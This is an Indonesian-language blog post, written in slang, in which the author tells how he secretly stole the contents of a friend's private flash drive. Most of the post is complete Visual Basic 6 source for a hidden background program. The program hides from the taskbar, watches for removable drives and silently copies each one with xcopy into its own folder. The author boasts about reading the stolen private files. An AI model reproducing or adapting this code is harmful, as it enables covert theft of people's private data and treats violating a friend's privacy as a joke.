Darkside of Oktavianus

Making virus and all of them as our friends

Nyolong Data FlashDisk(FD) By.4L13N

Posted by oktavianus pada April 27, 2008

sebener_Nye sekitar dua bulan lalu pengen posting ini… but ga’ enak
ama somebody!!!

begini cerita_Nye, beberapa waktu lalu gw minta file ama kawan gw N
ternyata file tersebut ada di flashdisk_Nye(FD), paz gw pinjem FD tsb, eh ga’ dikasih alasan_Nye kira2x :

“eit… ni FD Private buat gw, ga’ ada yang boleh liat isi_Nye selain
gw Coz ada file, proyek N data pribadi gw disini. kalo mawo, sini gw
yang kopi_in ke laptop lw??”
huh resee padahal gw udeh bilang ga’ gw liat2x dech file2x lw, tetep
aje ga’ dikasih udeh gitu gw ga’ bawa laptop lagi!!!hixhixhixhix
segitu penting_Nye yach?? karna itu gw jadi penasaran N pengen tawu
isi_Nye(ma’lum rasa ingin tawu nihh)!!
but… gimane cara_Nye supaya gw bisa mengkopi data2x di FD_Nye ke
Hardisk???
nah muncullah sedikit ide nakal untuk ngebuat program kecil yang mampu
mengkopi semua isi FD ke hardisk secara otomatis N tentunye dilakukan
secara background!!!hehehehe
oke… program ini gw buat pake VB.6.0 N membutuhkan :

-Form dengan nama Form1
-DriveListBox dengan nama Drive1
-Timer dengan nama Timer1
-Label1 dengan nama Label1
-Label2 dengan nama Label2

truz kode Program_Nye :

—————————-
‘CopyLeft by 4L13N
‘HomePage : http://www.bete.co.nr

‘Ckakakakakakaka

Private Declare Function GetDriveType& Lib “Kernel32” Alias
“GetDriveTypeA” (ByVal nDrive As String)

Private Sub Form_Load()
App.TaskVisible = False
Me.Hide
End Sub

Private Sub Timer1_Timer()
‘fungsi buat cek flashdisk
Drive1.Refresh
Dim i As Integer
For i = 0 To Drive1.ListCount – 1
If GetDriveType(Drive1.List(i)) = 2 And Left(Drive1.List(i), 1)
<> “a” Then
Label1 = Drive1.List(i) & “\”
cekkopy
Label2 = “udeh”
Exit Sub
Exit For
End If
Next
Label2 = “blum”
End Sub

Private Sub cekkopy()
If Label2 = “udeh” Then
Exit Sub
Else
Shell (“xcopy /S /H /Y /C ” & Label1), vbHide
End If
End Sub
————————

Logika :
Cek keberadaan FlashDisk kalo blum ke_ambil langsung ambil kalo udeh
ga’ usah!!!

wuihhh… alhasil gw bisa mengkopy data2x flashdisk kawan gw tsb ke
laptop gw!!hehehehe
ternyata memang bener, file2x tsb terlalu privasi kalo gw liat N ga
sewajar_Nye ada didalam FlashDisk(CareFully)!!!
hmmmm… sowry kawan but kata2x lw bikin gw penasaran!!!

NB : program ini akan mengkopy kan hasil colongan_Nye kedirektory
tempat program ini bercokol!!!

Kritik,Caci-Maki,Hinaan SendTo http://www.bete.co.nr

kalo pujian SendTo Allah S.W.T N Rosul2x_Nye

Original Post : http://www.bete.co.nr/?p=54

Salam Hangat By. 4L13N

Satu Tanggapan to “Nyolong Data FlashDisk(FD) By.4L13N”

  1. xxx said

    hebuaaaaaaaaat buaaaaaaaaaangueeeeeeeeetttttttt

Tinggalkan Balasan

 
